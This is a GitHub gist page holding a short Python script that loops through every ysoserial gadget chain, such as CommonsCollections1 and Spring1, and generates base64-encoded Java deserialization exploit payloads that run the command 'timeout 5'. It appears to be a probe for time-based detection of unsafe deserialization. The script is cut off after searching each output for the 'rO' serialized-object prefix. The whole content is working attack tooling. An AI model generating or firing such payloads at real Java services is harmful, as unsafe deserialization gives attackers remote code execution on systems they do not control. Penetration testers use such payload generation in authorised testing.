Naresh Kumar nareshkr22
nareshkr22
/ gist:026444ffbef3dc42285d501838009c64
Created
October 6, 2018 07:20
Generate payloads that exploit unsafe Java object deserialization using YoSerial
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import commands | |
| cmd = ['BeanShell1','C3P0','Clojure','CommonsBeanutils1','CommonsCollections1','CommonsCollections2','CommonsCollections3','CommonsCollections4','CommonsCollections5','CommonsCollections6','FileUpload1','Groovy1','Hibernate1','Hibernate2','JBossInterceptors1','JRMPClient','JRMPListener','JSON1','JavassistWeld1','Jdk7u21','Jython1','MozillaRhino1','Myfaces1','Myfaces2','ROME','Spring1','Spring2','URLDNS','Wicket1'] | |
| for i in cmd: | |
| output = commands.getstatusoutput('java -jar ysoserial-master-v0.0.5-g16fc48b-20.jar '+i+' "timeout 5" | base64 | tr -d "\n"') | |
| output = output[1] | |
| loc = output.find('rO') |